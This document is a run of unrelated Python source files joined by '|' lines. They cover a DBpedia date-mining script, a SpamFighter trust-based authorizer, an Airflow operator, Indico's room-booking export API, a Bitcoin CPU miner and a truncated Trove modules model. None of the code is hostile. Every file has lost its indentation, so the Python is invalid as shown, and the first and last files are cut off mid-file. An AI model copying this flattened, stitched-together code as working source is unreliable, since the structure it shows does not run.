# --------------------------------------------------
if theme_info:
result['MILESTONES'].append(
{'theme_info': theme_info})
if theme_info_json_file:
result['MILESTONES'].append(
{'theme_info_json_file': theme_info_json_file})
if theme_module_path:
result['MILESTONES'].append(
{'theme_module_path': theme_module_path})
# ==================================================
# save result
# --------------------------------------------------
tct.save_the_result(result, resultfile, params, facts, milestones, exitcode, CONTINUE, reason)
# ==================================================
# Return with proper exitcode
# --------------------------------------------------
sys.exit(exitcode)
|
from subprocess import *
import re
import treetaggerwrapper
import sparqlQuerypy
from bs4 import BeautifulSoup
CONSTANTKEYVERBS="die, died, death, born, birth, sworn in" #Set of words that if present in the sentence, then don't discard the sentence, we are interested.
tagger = treetaggerwrapper.TreeTagger(TAGLANG = 'en', TAGDIR = '/home/vedu29/python/Gsoc/treetagger')
def jarWrapper(*args): # The helper function to use the jar file.
process = Popen(['java', '-jar']+list(args), stdout=PIPE, stderr=PIPE)
ret=[]
while process.poll() is None:
line = process.stdout.readline()
if line != '' and line.endswith('\n'):
ret.append(line[:-1])
stdout, stderr = process.communicate()
ret += stdout.split('\n')
if stderr != '':
ret += stderr.split('\n')
ret.remove('')
return ret
def returnProperty(word): #helper function to map the verb to a property. This will be small considering the number of date properties in DBpedia.
if word in ['death', 'die']: return 'http://dbpedia.org/ontology/deathDate'
if word in ['birth', 'born', 'bear']: return 'http://dbpedia.org/ontology/birthDate'
def normalizeAnnotations(sentence): # helper function to remove the references annotation, that appear as square brackets at the end of the sentence.
return re.sub(r'\[[0-9]*\]', ' ', sentence)
def sentenceSplitter(sentence): # helper regular function to correctly find end of sentences.
return re.split(r'(?<!\w\.\w.)(?<![A-Z][a-z]\.)(?<=\.|\?)\s', sentence)
def normaliseResult(result):
normRes=[]
for sentence in result:
sent=normalizeAnnotations(sentence)
normRes += sentenceSplitter(sent)
return normRes
def findAndGenericAnnotateTime(sentence): #Replacing heidelTime tagged Timex tags to a generic 'TIME' so that treeTagger can work its magic without hiccups.
return re.sub('<TIMEX3((?!<TIMEX3).)*</TIMEX3>', 'TIME', sentence)
def treetag(sentence, encoding = None): # TreeTagger helper function.
if encoding != None:
return treetaggerwrapper.make_tags(tagger.tag_text(unicode(sentence, "utf-8")))
else:
return treetaggerwrapper.make_tags(tagger.tag_text(sentence))
def returnKeyverbs(): #formats the key verbs above.
return '|'.join(verb for verb in CONSTANTKEYVERBS.split(', '))
def findSubVerbsTime(tagsentence): # The main helper function that figures out the subject in the sentence and finds the correct core verbs marked by an '*'
pos=[]
pos2=[]
seenSubject=False
seenVerb=False
lastfew=0
for i, tags in enumerate(tagsentence):
if tags.pos=='NP' or tags.pos=='PP':
pos += [tags.word]
seenSubject=True
lastfew+=1
if re.match(u'V..|V.', tags.pos) != None and seenSubject:
if not seenVerb:
subject = pos[-lastfew:]
pos2 += [[subject]]
if re.match(u'VB.', tags.pos) != None:
pos2[-1] += [tags.word]
else:
pos2[-1] += [tags.word+'*']
seenVerb=True
if re.match(u'V..|V.', tags.pos) == None and seenVerb:
seenVerb=False
seenSubject=False
lastfew=0
return pos2
def lemmatizeMainVerb(item):
for verb in item[1:]:
if '*' in verb:
return treetag(verb)[0].lemma
def listTimes(sentence): # uses beautiful soup to get the date information.
soup = BeautifulSoup(sentence, 'html.parser')
return soup.find_all('timex3')
def main(args):
result = jarWrapper(*args)
for sentence in normaliseResult(result):
sent=findAndGenericAnnotateTime(sentence)
m = re.match(r"(?P<first_part>.*) (?P<predicate>%s) (?P<second_part>.*)"%(returnKeyverbs()), sent) #scans the sentences for this pattern.
if m!=None:
left=treetag(m.group('first_part'), "utf-8")
middle=treetag(m.group('predicate'), "utf-8")
right=treetag(m.group('second_part'), "utf-8")
tagsentence = left + middle + right
if 'TIME' in m.group('first_part') or 'TIME' in m.group('second_part'): #Skip sentence if not date details.
subVerbTime = findSubVerbsTime(tagsentence)
for item in subVerbTime:
subject=" ".join(thing for thing in item[0])
if subject.lower() in ['he','she', 'it']:
subject=previousSubject
annotate = sparqlQuerypy.findAnnotation(subject)
annotatedSubject = annotate[0]['s']['value']
previousSubject = subject #heuristic that subject of this pronoun is in deed the previous subject, (not well thought through!)
verbLemma=lemmatizeMainVerb(item)
if verbLemma != None: prop=returnProperty(verbLemma)
timexList = listTimes(sentence)
i=0
while timexList[i]['type']not in ["DATE","TIME"]:
i+=1
time= timexList[i]['value']
date= sparqlQuerypy.findDate(annotatedSubject, prop)
if len(date) != 0:
date= date[0]['z']['value']
print '- - - - - - - - - - - - - - - - \n \n'
print sentence
print ' '
print 'The subject is:', subject
print 'The annotated subject is:', annotatedSubject
print 'The property is:', prop
print 'Date according to dbpedia:', date
print 'Date mined from the text:', time
print '\n \n'
if __name__=='__main__':
args = ['de.unihd.dbs.heideltime.standalone.jar', 'input']
result = jarWrapper(*args)
tagger = treetaggerwrapper.TreeTagger(TAGLANG = 'en', TAGDIR = '/home/vedu29/python/Gsoc/treetagger')
main(args)
|
# -*- coding: utf-8 -*-
#
# SpamFighter, Copyright 2008, 2009 NetStream LLC (http://netstream.ru/, [email protected])
#
# This file is part of SpamFighter.
#
# SpamFighter is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SpamFighter is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SpamFighter. If not, see <http://www.gnu.org/licenses/>.
#
"""
Модуль авторизации партнеров без логинов/паролей (на доверии).
"""
from zope.interface import implements
from twisted.internet import defer
from spamfighter.interfaces import IPartner, IPartnerAuthorizer
from spamfighter.core.partner import PartnerAuthorizationFailedError
from spamfighter.core.domain import getDefaultDomain, BaseDomain
from spamfighter.plugin import loadPlugin, IDefaultDomainProvider
from spamfighter.utils import config
class NullPartner(object):
"""
Партнер, авторизованный без логина/пароля (на доверии).
@ivar domain: корневой домен партнера
@type domain: L{BaseDomain}
"""
implements(IPartner)
def __init__(self):
"""
Конструктор.
"""
domainProvider = loadPlugin(IDefaultDomainProvider, config.plugins.domain.null_partner_domain_provider)
self.domain = domainProvider.getDefaultDomain()
def rootDomain(self):
"""
Получить корневой домен партнера.
@return: Deferred, корневой домен (L{IDomain})
@rtype: C{twisted.internet.defer.Deferred}
"""
return defer.succeed(self.domain)
class NullPartnerAuthorizer(object):
"""
Провайдер авторизации партнеров без логина/пароля (на доверии).
В этой ситуации доступ к СпамоБорцу ограничен с помощью других средств
(HTTP-proxy, firewall).
@ivar partner: единственный партнер, который обеспечивает весь доступ
@type partner: L{NullPartner}
"""
implements(IPartnerAuthorizer)
def __init__(self):
"""
Конструктор.
"""
self.partner = NullPartner()
def authorize(self, partner_info):
"""
Выполнить авторизацию партнера.
@param partner_info: информация о партнере
@return: Deferred, партнер (L{IPartner})
@rtype: C{twisted.internet.defer.Deferred}
"""
if partner_info is not None:
return defer.fail(PartnerAuthorizationFailedError())
return defer.succeed(self.partner)
|
"""
.. module:: operators.dive_operator
:synopsis: DivePythonOperator for use with TaskRunner
.. moduleauthor:: Laura Lorenz <[email protected]>
.. moduleauthor:: Miriam Sexton <[email protected]>
"""
from airflow.operators import PythonOperator
from .dive_operator import DiveOperator
class DivePythonOperator(DiveOperator, PythonOperator):
"""
Python operator that can send along data dependencies to its callable.
Generates the callable by initializing its python object and calling its method.
"""
def __init__(self, python_object, python_method="run", *args, **kwargs):
self.python_object = python_object
self.python_method = python_method
kwargs['python_callable'] = None
super(DivePythonOperator, self).__init__(*args, **kwargs)
def pre_execute(self, context):
context.update(self.op_kwargs)
context.update({"data_dependencies": self.data_dependencies})
instantiated_object = self.python_object(context)
self.python_callable = getattr(instantiated_object, self.python_method)
|
# -*- coding: utf-8 -*-
##
##
## This file is part of Indico
## Copyright (C) 2002 - 2013 European Organization for Nuclear Research (CERN)
##
## Indico is free software: you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation, either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico. If not, see <http://www.gnu.org/licenses/>.
from datetime import datetime
import icalendar
import pytz
from babel.dates import get_timezone
from sqlalchemy import Time, Date
from sqlalchemy.sql import cast
from werkzeug.datastructures import OrderedMultiDict, MultiDict
from indico.core.config import Config
from indico.core.db import db
from indico.core.errors import IndicoError
from indico.modules.rb.utils import rb_check_user_access
from indico.modules.rb.models.reservations import Reservation, RepeatMapping, RepeatFrequency, ConflictingOccurrences
from indico.modules.rb.models.locations import Location
from indico.modules.rb.models.rooms import Room
from indico.util.date_time import utc_to_server
from indico.web.http_api import HTTPAPIHook
from indico.web.http_api.metadata import ical
from indico.web.http_api.responses import HTTPAPIError
from indico.web.http_api.util import get_query_parameter
from MaKaC.authentication import AuthenticatorMgr
from MaKaC.common.info import HelperMaKaCInfo
class RoomBookingHookBase(HTTPAPIHook):
GUEST_ALLOWED = False
def _getParams(self):
super(RoomBookingHookBase, self)._getParams()
self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None
self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None
self._occurrences = _yesno(get_query_parameter(self._queryParams, ['occ', 'occurrences'], 'no'))
def _hasAccess(self, aw):
return Config.getInstance().getIsRoomBookingActive() and rb_check_user_access(aw.getUser())
@HTTPAPIHook.register
class RoomHook(RoomBookingHookBase):
# e.g. /export/room/CERN/23.json
TYPES = ('room',)
RE = r'(?P<location>[\w\s]+)/(?P<idlist>\w+(?:-[\w\s]+)*)'
DEFAULT_DETAIL = 'rooms'
MAX_RECORDS = {
'rooms': 500,
'reservations': 100
}
VALID_FORMATS = ('json', 'jsonp', 'xml')
def _getParams(self):
super(RoomHook, self)._getParams()
self._location = self._pathParams['location']
self._ids = map(int, self._pathParams['idlist'].split('-'))
if self._detail not in {'rooms', 'reservations'}:
raise HTTPAPIError('Invalid detail level: %s' % self._detail, 400)
def export_room(self, aw):
loc = Location.find_first(name=self._location)
if loc is None:
return
# Retrieve rooms
rooms_data = list(Room.get_with_data('vc_equipment', 'non_vc_equipment',
filters=[Room.id.in_(self._ids), Room.location_id == loc.id]))
# Retrieve reservations
reservations = None
if self._detail == 'reservations':
reservations = OrderedMultiDict(_export_reservations(self, True, False, [
Reservation.room_id.in_(x['room'].id for x in rooms_data)
]))
for result in rooms_data:
yield _serializable_room(result, reservations)
@HTTPAPIHook.register
class RoomNameHook(RoomBookingHookBase):
# e.g. /export/roomName/CERN/pump.json
GUEST_ALLOWED = True
TYPES = ('roomName', )
RE = r'(?P<location>[\w\s]+)/(?P<room_name>[\w\s\-]+)'
DEFAULT_DETAIL = 'rooms'
MAX_RECORDS = {
'rooms': 500
}
VALID_FORMATS = ('json', 'jsonp', 'xml')
def _getParams(self):
super(RoomNameHook, self)._getParams()
self._location = self._pathParams['location']
self._room_name = self._pathParams['room_name']
def _hasAccess(self, aw):
# Access to RB data (no reservations) is public
return Config.getInstance().getIsRoomBookingActive()
def export_roomName(self, aw):
loc = Location.find_first(name=self._location)
if loc is None:
return
search_str = '%{}%'.format(self._room_name)
rooms_data = Room.get_with_data('vc_equipment', 'non_vc_equipment',
filters=[Room.location_id == loc.id, Room.name.ilike(search_str)])
for result in rooms_data:
yield _serializable_room(result)
@HTTPAPIHook.register
class ReservationHook(RoomBookingHookBase):
# e.g. /export/reservation/CERN.json
TYPES = ('reservation', )
RE = r'(?P<loclist>[\w\s]+(?:-[\w\s]+)*)'
DEFAULT_DETAIL = 'reservations'
MAX_RECORDS = {
'reservations': 100
}
VALID_FORMATS = ('json', 'jsonp', 'xml', 'ics')
@property
def serializer_args(self):
return {'ical_serializer': _ical_serialize_reservation}
def _getParams(self):
super(ReservationHook, self)._getParams()
self._locations = self._pathParams['loclist'].split('-')
def export_reservation(self, aw):
locations = Location.find_all(Location.name.in_(self._locations))
if not locations:
return
for room_id, reservation in _export_reservations(self, False, True):
yield reservation
@HTTPAPIHook.register
class BookRoomHook(HTTPAPIHook):
PREFIX = 'api'
TYPES = ('roomBooking',)
RE = r'bookRoom'
GUEST_ALLOWED = False
VALID_FORMATS = ('json', 'xml')
COMMIT = True
HTTP_POST = True
def _getParams(self):
super(BookRoomHook, self)._getParams()
self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None
self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None
if not self._fromDT or not self._toDT or self._fromDT.date() != self._toDT.date():
raise HTTPAPIError('from/to must be on the same day')
elif self._fromDT >= self._toDT:
raise HTTPAPIError('to must be after from')
elif self._fromDT < datetime.now():
raise HTTPAPIError('You cannot make bookings in the past')
username = get_query_parameter(self._queryParams, 'username')
avatars = username and filter(None, AuthenticatorMgr().getAvatarByLogin(username).itervalues())
if not avatars:
raise HTTPAPIError('Username does not exist')
elif len(avatars) != 1:
raise HTTPAPIError('Ambiguous username ({} users found)'.format(len(avatars)))
avatar = avatars[0]
self._params = {
'room_id': get_query_parameter(self._queryParams, 'roomid'),
'reason': get_query_parameter(self._queryParams, 'reason'),
'booked_for': avatar,
'from': self._fromDT,
'to': self._toDT
}
missing = [key for key, val in self._params.iteritems() if not val]
if missing:
raise HTTPAPIError('Required params missing: {}'.format(', '.join(missing)))
self._room = Room.get(self._params['room_id'])
if not self._room:
raise HTTPAPIError('A room with this ID does not exist')
def _hasAccess(self, aw):
if not Config.getInstance().getIsRoomBookingActive() or not rb_check_user_access(aw.getUser()):
return False
if self._room.can_be_booked(aw.getUser()):
return True
elif self._room.can_be_prebooked(aw.getUser()):
raise HTTPAPIError('The API only supports direct bookings but this room only allows pre-bookings.')
return False
def api_roomBooking(self, aw):
data = MultiDict({
'start_dt': self._params['from'],
'end_dt': self._params['to'],
'repeat_frequency': RepeatFrequency.NEVER,
'repeat_interval': 0,
'room_id': self._room.id,
'booked_for_id': self._params['booked_for'].getId(),
'contact_email': self._params['booked_for'].getEmail(),
'contact_phone': self._params['booked_for'].getTelephone(),
'booking_reason': self._params['reason']
})
try:
reservation = Reservation.create_from_data(self._room, data, aw.getUser())
except ConflictingOccurrences:
raise HTTPAPIError('Failed to create the booking due to conflicts with other bookings')
except IndicoError as e:
raise HTTPAPIError('Failed to create the booking: {}'.format(e))
db.session.add(reservation)
db.session.flush()
return {'reservationID': reservation.id}
def _export_reservations(hook, limit_per_room, include_rooms, extra_filters=None):
"""Exports reservations.
:param hook: The HTTPAPIHook instance
:param limit_per_room: Should the limit/offset be applied per room
:param include_rooms: Should reservations include room information
"""
filters = list(extra_filters) if extra_filters else []
if hook._fromDT and hook._toDT:
filters.append(cast(Reservation.start_dt, Date) <= hook._toDT.date())
filters.append(cast(Reservation.end_dt, Date) >= hook._fromDT.date())
filters.append(cast(Reservation.start_dt, Time) <= hook._toDT.time())
filters.append(cast(Reservation.end_dt, Time) >= hook._fromDT.time())
elif hook._toDT:
filters.append(cast(Reservation.end_dt, Date) <= hook._toDT.date())
filters.append(cast(Reservation.end_dt, Time) <= hook._toDT.time())
elif hook._fromDT:
filters.append(cast(Reservation.start_dt, Date) >= hook._fromDT.date())
filters.append(cast(Reservation.start_dt, Time) >= hook._fromDT.time())
filters += _get_reservation_state_filter(hook._queryParams)
occurs = [datetime.strptime(x, '%Y-%m-%d').date()
for x in filter(None, get_query_parameter(hook._queryParams, ['occurs'], '').split(','))]
data = ['vc_equipment']
if hook._occurrences:
data.append('occurrences')
order = {
'start': Reservation.start_dt,
'end': Reservation.end_dt
}.get(hook._orderBy, Reservation.start_dt)
if hook._descending:
order = order.desc()
reservations_data = Reservation.get_with_data(*data, filters=filters, limit=hook._limit, offset=hook._offset,
order=order, limit_per_room=limit_per_room, occurs_on=occurs)
for result in reservations_data:
yield result['reservation'].room_id, _serializable_reservation(result, include_rooms)
def _serializable_room(room_data, reservations=None):
"""Serializable room data
:param room_data: Room data
:param reservations: MultiDict mapping for room id => reservations
"""
data = room_data['room'].to_serializable('__api_public__')
data['_type'] = 'Room'
data['avc'] = bool(room_data['vc_equipment'])
data['vcList'] = room_data['vc_equipment']
data['equipment'] = room_data['non_vc_equipment']
if reservations is not None:
data['reservations'] = reservations.getlist(room_data['room'].id)
return data
def _serializable_room_minimal(room):
"""Serializable minimal room data (inside reservations)
:param room: A `Room`
"""
data = room.to_serializable('__api_minimal_public__')
data['_type'] = 'Room'
return data
def _serializable_reservation(reservation_data, include_room=False):
"""Serializable reservation (standalone or inside room)
:param reservation_data: Reservation data
:param include_room: Include minimal room information
"""
reservation = reservation_data['reservation']
data = reservation.to_serializable('__api_public__', converters={datetime: _add_server_tz})
data['_type'] = 'Reservation'
data['repeatability'] = None
if reservation.repeat_frequency:
data['repeatability'] = RepeatMapping.get_short_name(*reservation.repetition)
data['vcList'] = reservation_data['vc_equipment']
if include_room:
data['room'] = _serializable_room_minimal(reservation_data['reservation'].room)
if 'occurrences' in reservation_data:
data['occurrences'] = [o.to_serializable('__api_public__', converters={datetime: _add_server_tz})
for o in reservation_data['occurrences']]
return data
def _ical_serialize_repeatability(data):
start_dt_utc = data['startDT'].astimezone(pytz.utc)
end_dt_utc = data['endDT'].astimezone(pytz.utc)
WEEK_DAYS = 'MO TU WE TH FR SA SU'.split()
recur = ical.vRecur()
recur['until'] = end_dt_utc
if data['repeat_frequency'] == RepeatFrequency.DAY:
recur['freq'] = 'daily'
elif data['repeat_frequency'] == RepeatFrequency.WEEK:
recur['freq'] = 'weekly'
recur['interval'] = data['repeat_interval']
elif data['repeat_frequency'] == RepeatFrequency.MONTH:
recur['freq'] = 'monthly'
recur['byday'] = '{}{}'.format(start_dt_utc.day // 7, WEEK_DAYS[start_dt_utc.weekday()])
return recur
def _ical_serialize_reservation(cal, data, now):
start_dt_utc = data['startDT'].astimezone(pytz.utc)
end_dt_utc = datetime.combine(data['startDT'].date(), data['endDT'].timetz()).astimezone(pytz.utc)
event = icalendar.Event()
event.add('uid', 'indico-resv-%[email protected]' % data['id'])
event.add('dtstamp', now)
event.add('dtstart', start_dt_utc)
event.add('dtend', end_dt_utc)
event.add('url', data['bookingUrl'])
event.add('summary', data['reason'])
event.add('location', u'{}: {}'.format(data['location'], data['room']['fullName']))
event.add('description', data['reason'].decode('utf-8') + '\n\n' + data['bookingUrl'])
if data['repeat_frequency'] != RepeatFrequency.NEVER:
event.add('rrule', _ical_serialize_repeatability(data))
cal.add_component(event)
def _add_server_tz(dt):
if dt.tzinfo is None:
return dt.replace(tzinfo=get_timezone(HelperMaKaCInfo.getMaKaCInfoInstance().getTimezone()))
return dt
def _yesno(value):
return value.lower() in {'yes', 'y', '1', 'true'}
def _get_reservation_state_filter(params):
cancelled = get_query_parameter(params, ['cxl', 'cancelled'])
rejected = get_query_parameter(params, ['rej', 'rejected'])
confirmed = get_query_parameter(params, ['confirmed'])
archived = get_query_parameter(params, ['arch', 'archived', 'archival'])
repeating = get_query_parameter(params, ['rec', 'recurring', 'rep', 'repeating'])
avc = get_query_parameter(params, ['avc'])
avc_support = get_query_parameter(params, ['avcs', 'avcsupport'])
startup_support = get_query_parameter(params, ['sts', 'startupsupport'])
booked_for = get_query_parameter(params, ['bf', 'bookedfor'])
filters = []
if cancelled is not None:
filters.append(Reservation.is_cancelled == _yesno(cancelled))
if rejected is not None:
filters.append(Reservation.is_rejected == _yesno(rejected))
if confirmed is not None:
if confirmed == 'pending':
filters.append(Reservation.is_pending)
elif _yesno(confirmed):
filters.append(Reservation.is_accepted)
else:
filters.append(~Reservation.is_accepted)
filters.append(Reservation.is_rejected | Reservation.is_cancelled)
if archived is not None:
filters.append(Reservation.is_archived == _yesno(archived))
if repeating is not None:
if _yesno(repeating):
filters.append(Reservation.repeat_frequency != 0)
else:
filters.append(Reservation.repeat_frequency == 0)
if avc is not None:
filters.append(Reservation.uses_vc == _yesno(avc))
if avc_support is not None:
filters.append(Reservation.needs_vc_assistance == _yesno(avc_support))
if startup_support is not None:
filters.append(Reservation.needs_assistance == _yesno(startup_support))
if booked_for:
like_str = '%{}%'.format(booked_for.replace('?', '_').replace('*', '%'))
filters.append(Reservation.booked_for_name.ilike(like_str))
return filters
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9131
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
# Copyright 2016 Tesora, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Model classes that form the core of Module functionality."""
from datetime import datetime
import hashlib
from sqlalchemy.sql.expression import or_
from trove.common import cfg
from trove.common import crypto_utils
from trove.common import exception
from trove.common.i18n import _
from trove.common import utils
from trove.datastore import models as datastore_models
from trove.db import models
from oslo_log import log as logging
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class Modules(object):
DEFAULT_LIMIT = CONF.modules_page_size
ENCRYPT_KEY = CONF.module_aes_cbc_key
VALID_MODULE_TYPES = [mt.lower() for mt in CONF.module_types]
MATCH_ALL_NAME = 'all'
@staticmethod
def load(context, datastore=None):
if context is None:
raise TypeError("Argument context not defined.")
elif id is None:
raise TypeError("Argument is not defined.")
query_opts = {'deleted': False}
if datastore:
if datastore.lower() == Modules.MATCH_ALL_NAME:
datastore = None
query_opts['datastore_id'] = datastore
if context.is_admin:
db_info = DBModule.find_all(**query_opts)
if db_info.count() == 0:
LOG.debug("No modules found for admin user")
else:
# build a query manually, since we need current tenant
# plus the 'all' tenant ones
query_opts['visible'] = True
db_info = DBModule.query().filter_by(**query_opts)
db_info = db_info.filter(or_(DBModule.tenant_id == context.tenant,
DBModule.tenant_id.is_(None)))
if db_info.count() == 0:
LOG.debug("No modules found for tenant %s" % context.tenant)
modules = db_info.all()
return modules
@staticmethod
def load_auto_apply(context, datastore_id, datastore_version_id):
"""Return all the auto-apply modules for the given criteria."""
if context is None:
raise TypeError("Argument context not defined.")
elif id is None:
raise TypeError("Argument is not defined.")
query_opts = {'deleted': False,
'auto_apply': True}
db_info = DBModule.query().filter_by(**query_opts)
db_info = Modules.add_tenant_filter(db_info, context.tenant)
db_info = Modules.add_datastore_filter(db_info, datastore_id)
db_info = Modules.add_ds_version_filter(db_info, datastore_version_id)
if db_info.count() == 0:
LOG.debug("No auto-apply modules found for tenant %s" %
context.tenant)
modules = db_info.all()
return modules
@staticmethod
def add_tenant_filter(query, tenant_id):
return query.filter(or_(DBModule.tenant_id == tenant_id,
DBModule.tenant_id.is_(None)))
@staticmethod
def add_datastore_filter(query, datastore_id):
return query.filter(or_(DBModule.datastore_id == datastore_id,
DBModule.datastore_id.is_(None)))
@staticmethod
def add_ds_version_filter(query, datastore_version_id):
return query.filter(or_(
DBModule.datastore_version_id == datastore_version_id,
DBModule.datastore_version_id.is_(None)))
@staticmethod
def load_by_ids(context, module_ids):
"""Return all the modules for the given ids. Screens out the ones
for other tenants, unless the user is admin.
"""
if context is None:
raise TypeError("Argument context not defined.")
elif id is None:
raise TypeError("Argument is not defined.")
modules = []
if module_ids:
query_opts = {'deleted': False}
db_info = DBModule.query().filter_by(**query_opts)
if not context.is_admin:
db_info = Modules.add_tenant_filter(db_info, context.tenant)
db_info = db_info.filter(DBModule.id.in_(module_ids))
modules = db_info.all()
return modules
class Module(object):
def __init__(self, context, module_id):
self.context = context
self.module_id = module_id
@staticmethod
def create(context, name, module_type, contents,
description, tenant_id, datastore,
datastore_version, auto_apply, visible, live_update):
if module_type.lower() not in Modules.VALID_MODULE_TYPES:
LOG.error("Valid module types: %s" % Modules.VALID_MODULE_TYPES)
raise exception.ModuleTypeNotFound(module_type=module_type)
Module.validate_action(
